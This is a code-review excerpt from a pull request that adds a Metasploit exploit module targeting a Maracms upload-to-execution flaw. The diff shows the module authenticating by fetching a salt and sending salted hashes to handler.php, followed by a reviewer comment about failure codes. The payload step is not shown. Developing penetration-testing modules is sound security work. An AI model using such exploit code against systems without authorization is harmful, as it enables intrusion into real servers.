modules/exploits/multi/http/maracms_upload_exec.rb

```diff
@@ -0,0 +1,345 @@
+        'headsection' => '',
+        'data' => '',
+        'enccrc' => Digest::SHA256.hexdigest(''), # sha256 encoding of empty string
+        'crc' => '',
+        'srcfile' => '',
+        'destfile' => '',
+        'rawresponse' => '',
+        'response' => '',
+        'status' => Rex::Text.encode_base64('Sending Request').to_s,
+        'error' => ''
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed while trying to authenticate.')
+    end
+
+    unless res.code == 200 && res.body.include?('~::~')
+      fail_with(Failure::Unknown, 'Failed to authenticate to the server. Please check your credentials.')
+    end
+
+    # obtain salt
+    salt_base64 = res.body.to_s.split('~')[2] # the base64 encoded salt is returned in the format: ~::~encoded_salt~::~
+    salt = Rex::Text.decode_base64(salt_base64)
+    print_status("Obtained salt `#{salt}` from server. Using salt to authenticate...")
+
+    # use salt to generate authentication tokens
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    @username_base64 = Rex::Text.encode_base64(username) # this value is also used when uploading the payload
+    unsalted_hash = Digest::SHA256.hexdigest("#{password}#{@shash}#{username}")
+    salted_hash = Digest::SHA256.hexdigest("#{unsalted_hash}#{salt}")
+    @salted_hash_base64 = Rex::Text.encode_base64(salted_hash) # this value is also used when uploading the payload
+
+    # create data for POST request
+    data = "usr=#{@username_base64}"
+    data << "&hash=#{Rex::Text.encode_base64(unsalted_hash)}"
+    data << "&pwd=#{@salted_hash_base64}"
+    data << '&authenticated='
+    data << "&action=#{Rex::Text.encode_base64('login')}"
+    data << '&headsection='
+    data << '&data='
+    data << "&enccrc=#{Digest::SHA256.hexdigest('')}" # sha256 encoding of empty string
+    data << '&crc='
+    data << '&srcfile='
+    data << '&destfile='
+    data << "&rawresponse=#{Rex::Text.encode_base64(salt_base64)}"
+    data << '&response='
+    data << "&status=#{Rex::Text.encode_base64('Sending Request')}"
+    data << '&error='
+
+    nocache_value = rand # create new nocache_value
+
+    # authenticate via raw request to prevent unwanted encoding of `=` characters resulting from the need to base64 encode all data
+    res = send_request_raw({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'codebase', "handler.php?nocache=#{nocache_value}"),
+      'cookie' => @cookie,
+      'headers' => {
+        'Content-Type' => 'application/x-www-form-urlencoded',
+        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}"
+      },
+      'data' => data
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed while trying to authenticate.')
+    end
+
+    unless res.code == 200 && res.body.include?('~::~')
+      fail_with(Failure::Unknown, 'Failed to authenticate to the server. Please check your credentials.')
```

Comment:
If this is due to authentication failure, then `Failure::NoAccess` would be more appropriate.

```suggestion
      fail_with(Failure::NoAccess, 'Failed to authenticate to the server. Please check your credentials.')
```

Reply:
`NoAccess` is not yet appropriate here, but I did add it for the request that is sent after this one, which contains the login credentials.